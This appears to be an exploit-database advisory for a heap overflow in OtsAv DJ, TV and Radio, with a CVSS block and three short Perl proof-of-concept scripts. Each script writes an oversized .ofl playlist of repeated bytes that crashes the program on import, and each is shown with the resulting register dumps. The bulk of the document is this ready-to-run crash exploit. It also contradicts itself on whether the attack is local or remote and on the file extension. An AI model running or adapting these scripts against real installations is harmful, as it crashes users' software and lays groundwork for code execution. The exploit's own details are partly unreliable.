OtsAv DJ [.olf] Local Heap Overflow Poc

2009-10-28 / 2012-01-30
Credit: Stack
Risk: High
Local: Yes
Remote: No
CWE: CWE-119

CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

----------------------------------the first Poc------------------------------------ #!/usr/bin/perl # OtsAv DJ [.olf] Local Heap Overflow Poc # Down : http://serv-08.download.otszone.com/download.cgi/otsavdjtrialsetup.exe?A=13JTHRVWJLLLZ5JG2AYRNSMN%2DWJMQXDJKA%2DRFQ&otsavdjtrialsetup.exe # Desc : 7000 A' Heap overflow # By Mountassif Moad a.k.a Stack # v4 Team & evil finger # Open Stack.ofl >> File >> Import List >> As playlist >> # BOOOOOOOOOOOOOOOOOOOM # register of 7000 A' # EAX 41414141 # ECX 00E5448C OtsAVDJt.00E5448C # EDX 41414141 # EBX 00E54488 OtsAVDJt.00E54488 # ESP 02C6FE1C # EBP 00E0D328 OtsAVDJt.00E0D328 # ESI 00000000 # EDI 0174C070 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA # EIP 0046266C OtsAVDJt.0046266C # register of 2000 A' # EAX 41414141 # ECX 00001B05 # EDX 02FAF730 # EBX 0000042A # ESP 02FAF9C8 # EBP 00000000 # ESI 020FAFEA # EDI 02FAFEAA # EIP 0043C8D7 OtsAVDJt.0043C8D7 use strict; use warnings; my $A= "\x41" x 7000; open(my $ofl_playlist, "> stack.ofl"); print $ofl_playlist $A. "\r\n"; close $ofl_playlist; -------------------------------Second Poc----------------------------------------------------- #!/usr/bin/perl # OtsAv TV [.olf] Local Heap Overflow Poc # Down : http://www.otsav.com/buy/tv/ # Desc : 2000 A' Heap overflow # By Mountassif Moad a.k.a Stack # v4 Team & evil finger # Open Stack.ofl >> File >> Import List >> As playlist >> # BOOOOOOOOOOOOOOOOOOOM # EAX 45454545 # ECX 00009AF0 # EDX 03A0F730 # EBX 0000042A # ESP 03A0F9C8 # EBP 00000000 # ESI 02CD7102 # EDI 03A0FEAA # EIP 0043C8D7 OtsAVTVt.0043C8D7 use strict; use warnings; my $A= "\x45" x 2000; open(my $ofl_playlist, "> stack.ofl"); print $ofl_playlist $A. "\r\n"; close $ofl_playlist; ----------------------------------- 3 POC------------------------------------------------- #!/usr/bin/perl # OtsAv Radio [.olf] Local Heap Overflow Poc # Down : http://www.otsav.com/buy/radio/ # Desc : 2000 A' Heap overflow # By Mountassif Moad a.k.a Stack # v4 Team & evil finger # Open Stack.ofl >> File >> Import List >> As playlist >> # BOOOOOOOOOOOOOOOOOOOM # EAX 45454545 # ECX 0000CD32 # EDX 0224F730 # EBX 00000452 # ESP 0224F9C8 # EBP 00000000 # ESI 00C8E0EA # EDI 0224FED2 # EIP 0043B497 OtsAVRDt.0043B497 use strict; use warnings; my $A= "\x45" x 2000; open(my $ofl_playlist, "> stack.ofl"); print $ofl_playlist $A. "\r\n"; close $ofl_playlist;



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